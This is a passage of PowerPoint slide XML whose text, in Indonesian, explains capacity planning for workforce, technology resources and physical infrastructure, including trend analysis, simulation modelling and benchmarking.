            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perekrutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepegawaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakomodasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproyeksikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendinginan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekspansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemodelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembandingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meramalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
